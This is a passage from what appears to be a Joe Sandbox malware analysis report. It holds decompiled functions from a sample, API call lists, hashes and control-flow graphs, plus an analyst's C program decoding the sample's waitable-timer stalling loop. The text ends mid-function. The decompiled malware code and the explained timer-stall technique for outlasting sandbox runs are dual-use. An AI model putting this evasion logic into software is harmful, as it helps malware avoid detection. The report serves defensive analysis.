                                                  • wcstombs.NTDLL ref: 04B38DFC
                                                    • Part of subcall function 04B3163F: SysAllocString.OLEAUT32(?), ref: 04B31680
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 04B38E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B38E49
                                                  • HeapFree.KERNEL32(00000000,?,?,06AF95B0), ref: 04B38E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38E6D
                                                  Memory Dump Source
                                                   • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                   • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 09e704dd1337a9f9657a25771b7a775fa3bdb6c20f2f6f99cb817ec42d0c241f
                                                  • Instruction ID: 17136a180c8c414cb3f662f9d9db3052897f43f6569197b50f03ba440e0e711b
                                                  • Opcode Fuzzy Hash: 09e704dd1337a9f9657a25771b7a775fa3bdb6c20f2f6f99cb817ec42d0c241f
                                                  • Instruction Fuzzy Hash: 93915A71900218AFDF11EFAADC84A9E7BB9EF08316F144496F808E7260D739ED51DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                   Control-flow Graph (edge list exported from the report's interactive graph, which colours each basic block as Executed or Not Executed; "A->B" is an edge from block A to block B, API names follow the block that calls them)
                                                  control_flow_graph 97 4b3ade5-4b3ae4a 98 4b3ae6b-4b3ae95 97->98 99 4b3ae4c-4b3ae66 RaiseException 97->99 101 4b3ae97 98->101 102 4b3ae9a-4b3aea6 98->102 100 4b3b01b-4b3b01f 99->100 101->102 103 4b3aeb9-4b3aebb 102->103 104 4b3aea8-4b3aeb3 102->104 105 4b3af63-4b3af6d 103->105 106 4b3aec1-4b3aec8 103->106 104->103 112 4b3affe-4b3b005 104->112 108 4b3af79-4b3af7b 105->108 109 4b3af6f-4b3af77 105->109 110 4b3aeca-4b3aed6 106->110 111 4b3aed8-4b3aee5 LoadLibraryA 106->111 113 4b3aff9-4b3affc 108->113 114 4b3af7d-4b3af80 108->114 109->108 110->111 116 4b3af28-4b3af34 InterlockedExchange 110->116 115 4b3aee7-4b3aef7 GetLastError 111->115 111->116 118 4b3b007-4b3b014 112->118 119 4b3b019 112->119 113->112 121 4b3af82-4b3af85 114->121 122 4b3afae-4b3afbc GetProcAddress 114->122 123 4b3af07-4b3af23 RaiseException 115->123 124 4b3aef9-4b3af05 115->124 125 4b3af36-4b3af3a 116->125 126 4b3af5c-4b3af5d FreeLibrary 116->126 118->119 119->100 121->122 127 4b3af87-4b3af92 121->127 122->113 128 4b3afbe-4b3afce GetLastError 122->128 123->100 124->116 124->123 125->105 129 4b3af3c-4b3af48 LocalAlloc 125->129 126->105 127->122 131 4b3af94-4b3af9a 127->131 133 4b3afd0-4b3afd8 128->133 134 4b3afda-4b3afdc 128->134 129->105 130 4b3af4a-4b3af5a 129->130 130->105 131->122 136 4b3af9c-4b3af9f 131->136 133->134 134->113 135 4b3afde-4b3aff6 RaiseException 134->135 135->113 136->122 138 4b3afa1-4b3afac 136->138 138->113 138->122
                                                  C-Code - Quality: 51%
                                                   			E04B3ADE5(long _a4, long _a8) {
                                                   				// Field layout, hook notification codes and exception codes match the MSVC CRT delay-load helper
                                                   				// (__delayLoadHelper2 in delayhlp.cpp): _a4 is the ImgDelayDescr for one delay-loaded DLL, _a8 the
                                                   				// address of the IAT slot being resolved, image base 0x4b30000. Delay-loaded imports are absent from
                                                   				// the regular import table and are resolved here with LoadLibraryA/GetProcAddress on first call.
                                                   				signed int _v8;
                                                   				intOrPtr _v16;
                                                   				LONG* _v28;
                                                   				long _v40;
                                                   				long _v44;
                                                   				long _v48;
                                                   				CHAR* _v52;
                                                   				long _v56;
                                                   				CHAR* _v60;
                                                   				long _v64;
                                                   				signed int* _v68;
                                                   				char _v72;
                                                   				signed int _t76;
                                                   				signed int _t80;
                                                   				signed int _t81;
                                                   				intOrPtr* _t82;
                                                   				intOrPtr* _t83;
                                                   				intOrPtr* _t85;
                                                   				intOrPtr* _t90;
                                                   				intOrPtr* _t95;
                                                   				intOrPtr* _t98;
                                                   				struct HINSTANCE__* _t99;
                                                   				void* _t102;
                                                   				intOrPtr* _t104;
                                                   				void* _t115;
                                                   				long _t116;
                                                   				void _t125;
                                                   				void* _t131;
                                                   				signed short _t133;
                                                   				struct HINSTANCE__* _t138;
                                                   				signed int* _t139;
                                                   
                                                   				_t139 = _a4;
                                                   				_v28 = _t139[2] + 0x4b30000; // rvaHmod: cached HMODULE
                                                   				_t115 = _t139[3] + 0x4b30000; // rvaIAT
                                                   				_t131 = _t139[4] + 0x4b30000; // rvaINT (name/ordinal thunks)
                                                   				_v8 = _t139[7]; // dwTimeStamp of the DLL the image was bound against
                                                   				_v60 = _t139[1] + 0x4b30000; // rvaDLLName
                                                   				_v16 = _t139[5] + 0x4b30000; // rvaBoundIAT
                                                   				_v64 = _a8; // DelayLoadInfo.ppfn (_v72.._v40 form the DelayLoadInfo passed to the hooks)
                                                   				_v72 = 0x24; // DelayLoadInfo.cb
                                                   				_v68 = _t139; // DelayLoadInfo.pidd
                                                   				_v56 = 0;
                                                   				asm("stosd");
                                                   				_v48 = 0;
                                                   				_v44 = 0;
                                                   				_v40 = 0;
                                                   				if(( *_t139 & 0x00000001) == 0) { // dlattrRva not set: descriptor is not in the RVA form this helper handles
                                                   					_a8 =  &_v72;
                                                   					RaiseException(0xc06d0057, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER)
                                                   					return 0;
                                                   				}
                                                   				_t138 =  *_v28;
                                                   				_t76 = _a8 - _t115 >> 2 << 2; // byte offset of the IAT slot, reused as the index into the parallel INT
                                                   				_t133 =  *(_t131 + _t76);
                                                   				_a4 = _t76;
                                                   				_t80 =  !(_t133 >> 0x1f) & 0x00000001; // fImportByName: high bit clear means import by name
                                                   				_v56 = _t80;
                                                   				_t81 = _t133 + 0x4b30002; // IMAGE_IMPORT_BY_NAME.Name (skips the 2-byte Hint)
                                                   				if(_t80 == 0) {
                                                   					_t81 = _t133 & 0x0000ffff; // import by ordinal
                                                   				}
                                                   				_v52 = _t81;
                                                   				_t82 =  *0x4b3d1a0; // 0x0 (__pfnDliNotifyHook2, null in this memory dump)
                                                   				_t116 = 0;
                                                   				if(_t82 == 0) {
                                                   					L6:
                                                   					if(_t138 != 0) {
                                                   						L18:
                                                   						_t83 =  *0x4b3d1a0; // 0x0
                                                   						_v48 = _t138; // DelayLoadInfo.hmodCur
                                                   						if(_t83 != 0) {
                                                   							_t116 =  *_t83(2,  &_v72); // dliNotePreGetProcAddress
                                                   						}
                                                   						if(_t116 != 0) {
                                                   							L32:
                                                   							 *_a8 = _t116; // patch the IAT slot with the resolved address
                                                   							L33:
                                                   							_t85 =  *0x4b3d1a0; // 0x0
                                                   							if(_t85 != 0) {
                                                   								_v40 = _v40 & 0x00000000;
                                                   								_v48 = _t138;
                                                   								_v44 = _t116;
                                                   								 *_t85(5,  &_v72); // dliNoteEndProcessing
                                                   							}
                                                   							return _t116;
                                                   						} else {
                                                   							if(_t139[5] == _t116 || _t139[7] == _t116) { // no bound IAT or no timestamp: bound addresses unusable
                                                   								L27:
                                                   								_t116 = GetProcAddress(_t138, _v52);
                                                   								if(_t116 == 0) {
                                                   									_v40 = GetLastError(); // DelayLoadInfo.dwLastError
                                                   									_t90 =  *0x4b3d19c; // 0x0 (__pfnDliFailureHook2)
                                                   									if(_t90 != 0) {
                                                   										_t116 =  *_t90(4,  &_v72); // dliFailGetProc
                                                   									}
                                                   									if(_t116 == 0) {
                                                   										_a4 =  &_v72;
                                                   										RaiseException(0xc06d007f, _t116, 1,  &_a4); // VcppException(ERROR_SEVERITY_ERROR, ERROR_PROC_NOT_FOUND)
                                                   										_t116 = _v44; // an exception handler may have filled in DelayLoadInfo.pfnCur
                                                   									}
                                                   								}
                                                   								goto L32;
                                                   							} else {
                                                   								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138; // e_lfanew: IMAGE_NT_HEADERS of the loaded DLL
                                                   								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) { // "PE\0\0", FileHeader.TimeDateStamp == dwTimeStamp, OptionalHeader.ImageBase == hmod: the bound addresses are still valid
                                                   									_t116 =  *(_a4 + _v16); // take the address from the bound IAT, no GetProcAddress needed
                                                   									if(_t116 != 0) {
                                                   										goto L32;
                                                   									}
                                                   								}
                                                   								goto L27;
                                                   							}
                                                   						}
                                                   					}
                                                   					_t98 =  *0x4b3d1a0; // 0x0
                                                   					if(_t98 == 0) {
                                                   						L9:
                                                   						_t99 = LoadLibraryA(_v60); // executed
                                                   						_t138 = _t99;
                                                   						if(_t138 != 0) {
                                                   							L13:
                                                   							if(InterlockedExchange(_v28, _t138) == _t138) { // another thread already cached this module: drop the extra reference
                                                   								FreeLibrary(_t138);
                                                   							} else {
                                                   								if(_t139[6] != 0) { // rvaUnloadIAT present: remember the descriptor so the DLL can be unloaded later
                                                   									_t102 = LocalAlloc(0x40, 8);
                                                   									if(_t102 != 0) {
                                                   										 *(_t102 + 4) = _t139;
                                                   										_t125 =  *0x4b3d198; // 0x0 (head of the unload list)
                                                   										 *_t102 = _t125;
                                                   										 *0x4b3d198 = _t102;
                                                   									}
                                                   								}
                                                   							}
                                                   							goto L18;
                                                   						}
                                                   						_v40 = GetLastError();
                                                   						_t104 =  *0x4b3d19c; // 0x0
                                                   						if(_t104 == 0) {
                                                   							L12:
                                                   							_a8 =  &_v72;
                                                   							RaiseException(0xc06d007e, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND)
                                                   							return _v44;
                                                   						}
                                                   						_t138 =  *_t104(3,  &_v72); // dliFailLoadLib
                                                   						if(_t138 != 0) {
                                                   							goto L13;
                                                   						}
                                                   						goto L12;
                                                   					}
                                                   					_t138 =  *_t98(1,  &_v72); // dliNotePreLoadLibrary
                                                   					if(_t138 != 0) {
                                                   						goto L13;
                                                   					}
                                                   					goto L9;
                                                   				}
                                                   				_t116 =  *_t82(0,  &_v72); // dliStartProcessing; a non-zero return is used as the resolved address
                                                   				if(_t116 != 0) {
                                                   					goto L33;
                                                   				}
                                                   				goto L6;
			}

Instruction addresses (one per decompiled line above, in order; 0x00000000 marks a line with no address):
0x04b3adf4 0x04b3ae0a 0x04b3ae10 0x04b3ae12 0x04b3ae17 0x04b3ae1d 0x04b3ae22 0x04b3ae25
0x04b3ae33 0x04b3ae3a 0x04b3ae3d 0x04b3ae40 0x04b3ae41 0x04b3ae44 0x04b3ae47 0x04b3ae4a
0x04b3ae4f 0x04b3ae5e 0x00000000 0x04b3ae64 0x04b3ae6e 0x04b3ae78 0x04b3ae7d 0x04b3ae7f
0x04b3ae89 0x04b3ae8c 0x04b3ae8f 0x04b3ae95 0x04b3ae97 0x04b3ae97 0x04b3ae9a 0x04b3ae9d
0x04b3aea2 0x04b3aea6 0x04b3aeb9 0x04b3aebb 0x04b3af63 0x04b3af63 0x04b3af6a 0x04b3af6d
0x04b3af77 0x04b3af77 0x04b3af7b 0x04b3aff9 0x04b3affc 0x04b3affe 0x04b3affe 0x04b3b005
0x04b3b007 0x04b3b011 0x04b3b014 0x04b3b017 0x04b3b017 0x00000000 0x04b3af7d 0x04b3af80
0x04b3afae 0x04b3afb8 0x04b3afbc 0x04b3afc4 0x04b3afc7 0x04b3afce 0x04b3afd8 0x04b3afd8
0x04b3afdc 0x04b3afe1 0x04b3aff0 0x04b3aff6 0x04b3aff6 0x04b3afdc 0x00000000 0x04b3af87
0x04b3af8a 0x04b3af92 0x04b3afa7 0x04b3afac 0x00000000 0x00000000 0x04b3afac 0x00000000
0x04b3af92 0x04b3af80 0x04b3af7b 0x04b3aec1 0x04b3aec8 0x04b3aed8 0x04b3aedb 0x04b3aee1
0x04b3aee5 0x04b3af28 0x04b3af34 0x04b3af5d 0x04b3af36 0x04b3af3a 0x04b3af40 0x04b3af48
0x04b3af4a 0x04b3af4d 0x04b3af53 0x04b3af55 0x04b3af55 0x04b3af48 0x04b3af3a 0x00000000
0x04b3af34 0x04b3aeed 0x04b3aef0 0x04b3aef7 0x04b3af07 0x04b3af0a 0x04b3af1a 0x00000000
0x04b3af20 0x04b3af01 0x04b3af05 0x00000000 0x00000000 0x00000000 0x04b3af05 0x04b3aed2
0x04b3aed6 0x00000000 0x00000000 0x00000000 0x04b3aed6 0x04b3aeaf 0x04b3aeb3 0x00000000
0x00000000 0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04B3AE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 04B3AEDB
                                                  • GetLastError.KERNEL32 ref: 04B3AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04B3AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: e6d5e71f569919f81d030789620792d2a8a7330c31febc313749e592c23cbba4
                                                  • Instruction ID: 2b79f4c3f4b08d177e9ec836c5b8d8f1ab92cd78f3d39083564131e947b6363c
                                                  • Opcode Fuzzy Hash: e6d5e71f569919f81d030789620792d2a8a7330c31febc313749e592c23cbba4
                                                  • Instruction Fuzzy Hash: D4813CB5A00605AFDB10CFAAD884BADB7F5EF4C312F20816AF545E7240E774E945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
Control-flow graph of E04B36786 (node id: address range, notable calls in the block):
  139: 4b36786-4b367b2 memset, CreateWaitableTimerA
  140: 4b36913-4b36919 GetLastError
  141: 4b367b8-4b36808 _allmul, SetWaitableTimer, WaitForMultipleObjects
  142: 4b3691c-4b36923
  143: 4b36883-4b36888
  144: 4b3680a-4b3680d
  145: 4b36889-4b3688d
  146: 4b36818
  147: 4b3680f call 4b373fd
  148: 4b3688f-4b36897 HeapFree
  149: 4b3689d-4b368a1
  151: 4b36822
  152: 4b36814-4b36816
  153: 4b368a3-4b368ac CloseHandle
  154: 4b36825-4b36829
  155: 4b3683b-4b3685a call 4b38504
  156: 4b3682b-4b36832
  157: 4b36834
  159: 4b3685f-4b36864
  160: 4b36866-4b3686f
  161: 4b368ae-4b368b3
  162: 4b36871-4b36880 call 4b33bf1
  163: 4b368d2-4b368da
  164: 4b368b5-4b368bb
  165: 4b368e0-4b36908 _allmul, SetWaitableTimer, WaitForMultipleObjects
  167: 4b368bd-4b368d0 call 4b3a1b0
  168: 4b3690e
Edges: 139->140, 139->141, 140->142, 141->143, 141->144, 143->145, 144->146, 144->147, 145->148, 145->149, 146->151, 147->152, 148->149, 149->145, 149->153, 151->154, 152->146, 152->151, 153->142, 154->155, 154->156, 155->159, 156->155, 156->157, 157->155, 159->160, 159->161, 160->154, 160->162, 161->163, 161->164, 162->143, 163->165, 164->143, 164->167, 165->154, 165->168, 167->165, 168->143
                                                  C-Code - Quality: 83%
                                                  			E04B36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0x4b3d240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L04B3B0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0x4b3d26c; // 0x31c
                                                  					_v40 = _t51;
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0x4b3d24c = 5;
                                                  						} else {
                                                  							_t68 = E04B373FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0x4b3d260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						_t60 = E04B38504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8.LowPart = E04B33BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0x4b3d244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0x4b3d248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E04B3A1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0x4b3d248);
                                                  								L21:
                                                  								L04B3B0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0x4b3d238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
			}

Instruction addresses (one per decompiled line above, in order; 0x00000000 marks a line with no address):
0x04b36786 0x04b36798 0x04b3679b 0x04b367a7 0x04b367af 0x04b367b2 0x04b36919 0x04b367b8
0x04b367b8 0x04b367ba 0x04b367bf 0x04b367c0 0x04b367c6 0x04b367c9 0x04b367cc 0x04b367da
0x04b367e5 0x04b367e8 0x04b367ea 0x04b367f7 0x04b36801 0x04b36805 0x04b36808 0x04b3680d
0x04b36818 0x04b36818 0x04b3680f 0x04b3680f 0x04b36816 0x00000000 0x00000000 0x04b36816
0x04b36822 0x00000000 0x04b36825 0x04b36829 0x04b36834 0x04b36834 0x04b3683b 0x04b36844
0x04b3684b 0x04b36854 0x04b36857 0x04b3685a 0x04b36861 0x04b36864 0x00000000 0x00000000
0x04b36866 0x04b36869 0x04b3686c 0x04b3686f 0x00000000 0x04b36871 0x04b36880 0x04b36880
0x00000000 0x04b368ae 0x04b368ae 0x04b368b3 0x04b368d2 0x04b368d4 0x04b368d9 0x04b368da
0x00000000 0x04b368b5 0x04b368b5 0x04b368bb 0x00000000 0x04b368bd 0x04b368bd 0x04b368c2
0x04b368c4 0x04b368c9 0x04b368ca 0x04b368e0 0x04b368e0 0x04b368e8 0x04b368f3 0x04b368f6
0x04b36901 0x04b36903 0x04b36905 0x04b36908 0x00000000 0x04b3690e 0x00000000 0x04b3690e
0x04b36908 0x04b368bb 0x00000000 0x04b368b3 0x04b36883 0x04b36885 0x04b36888 0x04b36889
0x04b36889 0x04b3688d 0x04b36897 0x04b36897 0x04b3689d 0x04b368a0 0x04b368a0 0x04b368a6
0x04b368a6 0x04b36923 0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 04B3679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04B367A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04B367CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04B367E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B36801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B36897
                                                  • CloseHandle.KERNEL32(?), ref: 04B368A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04B368E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04B32417,?), ref: 04B368F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B36901
                                                    • Part of subcall function 04B373FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06AF9388,00000000,?,7519F710,00000000,7519F730), ref: 04B3744C
                                                    • Part of subcall function 04B373FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06AF93C0,?,00000000,30314549,00000014,004F0053,06AF937C), ref: 04B374E9
                                                    • Part of subcall function 04B373FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B36814), ref: 04B374FB
                                                  • GetLastError.KERNEL32 ref: 04B36913
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 957a67e91ec007503bae969b80a6c8baec681b796f4ba461309c56b535e6c263
                                                  • Instruction ID: c08aff40b5192a0335fff27f52ed3dd164fdcefbc3c2d32a8be5a1d6a46c6256
                                                  • Opcode Fuzzy Hash: 957a67e91ec007503bae969b80a6c8baec681b796f4ba461309c56b535e6c263
                                                  • Instruction Fuzzy Hash: 6E511C71805229BADF20DFD6DC449EEBFB8EF49326F204256F815B6190D774AA44CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
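Analyst note on the stalling loop in E04B36786 above. Every wait in that function is a SetWaitableTimer due time built by _allmul from one config dword and a fixed constant (0xff676980 or 0xdc3cba00, each paired with a 0xffffffff high dword), then blocked on with WaitForMultipleObjects(2, &_v44, 0, INFINITE) against the timer and the second handle loaded from 0x4b3d26c. The C program below is an added example, not code from the sample or from this report: it reproduces that arithmetic so the sleep length can be read off the decompiled constants. The mapping of the four pushes onto _allmul(a_lo, a_hi, b_lo, b_hi) is my reconstruction of the CRT helper's calling convention, the function names are mine, and the config values first_wait, retry_wait and backoff_units are constructed, because the real dwords at 0x4b3d240, 0x4b3d244 and 0x4b3d248 are not shown in the report.

```c
/*
 * Added example; not code from the analysed sample or from the Joe Sandbox report.
 * Decodes the SetWaitableTimer due time built in E04B36786.
 *
 * Decompiled call sites, reading the pushes in calling order as the CRT helper
 * _allmul(a_lo, a_hi, b_lo, b_hi) (this argument mapping is a reconstruction):
 *   _allmul(*0x4b3d240, 0, 0xff676980, 0xffffffff)   first wait
 *   _allmul(*0x4b3d244, 0, 0xff676980, 0xffffffff)   wait before retrying E04B38504
 *   _allmul(*0x4b3d248, 0, 0xdc3cba00, 0xffffffff)   wait when E04B38504 returns 0x10d2
 * The EAX:EDX result is stored into _v36.LowPart/_v32, the LARGE_INTEGER handed to
 * SetWaitableTimer. A negative due time is relative, counted in 100 ns units.
 */
#include <stdint.h>
#include <stdio.h>

/* 64-bit multiply as _allmul does it: each operand is a (low, high) dword pair. */
static int64_t allmul(uint32_t a_lo, uint32_t a_hi, uint32_t b_lo, uint32_t b_hi)
{
    int64_t a = (int64_t)(((uint64_t)a_hi << 32) | a_lo);
    int64_t b = (int64_t)(((uint64_t)b_hi << 32) | b_lo);
    return a * b;
}

/* The 32-bit constant as the signed value its 0xffffffff high dword makes it. */
static int32_t signed_dword(uint32_t v)
{
    return (int32_t)v;
}

/* Seconds a relative (negative) due time sleeps; 0 for a zero or absolute time. */
static double due_time_seconds(int64_t due_100ns)
{
    return due_100ns < 0 ? (double)(-due_100ns) / 1e7 : 0.0;
}

/* Seconds slept for one config dword and one of the two multiplier constants. */
static double stall_seconds(uint32_t config_value, uint32_t unit_constant)
{
    return due_time_seconds(allmul(config_value, 0, unit_constant, 0xffffffffu));
}

/* The two halves the decompiled code stores into _v36.LowPart and _v32. */
static uint32_t due_low(int64_t v)  { return (uint32_t)((uint64_t)v & 0xffffffffu); }
static uint32_t due_high(int64_t v) { return (uint32_t)((uint64_t)v >> 32); }

int main(void)
{
    /* Constructed config values; the real dwords at 0x4b3d240/0x4b3d244/0x4b3d248 are not in the report. */
    const uint32_t first_wait = 5, retry_wait = 30, backoff_units = 2;

    printf("0xff676980 widens to %d (100 ns units) = %.0f s per config unit\n",
           signed_dword(0xff676980u), stall_seconds(1, 0xff676980u));
    printf("0xdc3cba00 widens to %d (100 ns units) = %.0f s per config unit\n",
           signed_dword(0xdc3cba00u), stall_seconds(1, 0xdc3cba00u));

    int64_t due = allmul(first_wait, 0, 0xff676980u, 0xffffffffu);
    printf("first wait:  _v36.LowPart=0x%08x _v32=0x%08x -> %.0f s\n",
           due_low(due), due_high(due), due_time_seconds(due));
    due = allmul(retry_wait, 0, 0xff676980u, 0xffffffffu);
    printf("retry wait:  _v36.LowPart=0x%08x _v32=0x%08x -> %.0f s\n",
           due_low(due), due_high(due), due_time_seconds(due));
    due = allmul(backoff_units, 0, 0xdc3cba00u, 0xffffffffu);
    printf("0x10d2 wait: _v36.LowPart=0x%08x _v32=0x%08x -> %.0f s\n",
           due_low(due), due_high(due), due_time_seconds(due));
    return 0;
}
```

The two constants decode to -10,000,000 and -600,000,000 hundred-nanosecond units, so the first two config dwords are sleep lengths in seconds and the third is a count of minutes. Because the wait uses an INFINITE timeout, the thread stays blocked until the timer fires or the handle at 0x4b3d26c is signaled; with a large config value the sample never reaches E04B38504 or E04B33BF1 inside a short sandbox run, which is what the "stalling execution" signature in this report is reacting to. When triaging a new build, read the three dwords from the dumped config region and feed them to stall_seconds to get the actual delay instead of guessing from the hex.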

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B31B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
